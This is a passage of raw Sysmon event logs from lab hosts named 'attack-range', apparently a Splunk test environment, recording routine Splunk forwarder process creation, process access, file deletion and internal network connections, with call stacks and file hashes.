LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-161B-6216-EB06-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.267{C8EA50B7-161B-6216-EB06-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.887{C8EA50B7-161C-6216-ED06-000000003802}70607032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-161C-6216-ED06-000000003802}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-161C-6216-ED06-000000003802}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.529{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-161C-6216-ED06-000000003802}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.530{C8EA50B7-161C-6216-ED06-000000003802}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF06D3AF4AA37EF671FC80B37D56BA37,SHA256=710110C9394484B7A330F4E437E45FD5D09656D34951A1E1E3E2430C6E3DF436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:20.366{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64260D9F53250BBC07D9C6E3288D081C,SHA256=63AE9FF9827D83FDB9733E6A2119CC421CFF5C49344D5C998AFA859A115409B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.129{C8EA50B7-161B-6216-EC06-000000003802}62566576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.486{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7D1AC540BC4058EBADB4B62A43604D8,SHA256=E45B627F34C141C9D395D9844D018C37F25A9A94A703D81E28D6CF5DA508BAEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:21.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA91E0E9DBE9E2F1DA401E218344842E,SHA256=4A61EC93140F561684178F11109BFFE8CB27946929FF9E84526D2B4E92F8C5BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-161D-6216-EE06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-161D-6216-EE06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.418{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-161D-6216-EE06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:21.419{C8EA50B7-161D-6216-EE06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000220265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:18.659{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51571-false10.0.1.12-8000- 23542300x8000000000000000220267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:22.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEC16FB1D80068C0363BCC0D3AAF0F20,SHA256=F16DA67BBB64B259291DE98592505E8B42B12C4363BF21361C4AD8D7FE3E2FAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:20.560{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49322-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:22.502{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52D075434A76F79BF4B0420AAF89ECA,SHA256=52C8C772AF241695366F22D7EDF4D82FF7E234077BB5FDF50228288D7E0A406F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:23.502{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF87A88FA3C4D7FCD6D0104265E80658,SHA256=CEF66D62D703C019796F4DAEBFE340B9E43F9095159592E9FDED9C45A06A41CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:23.475{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 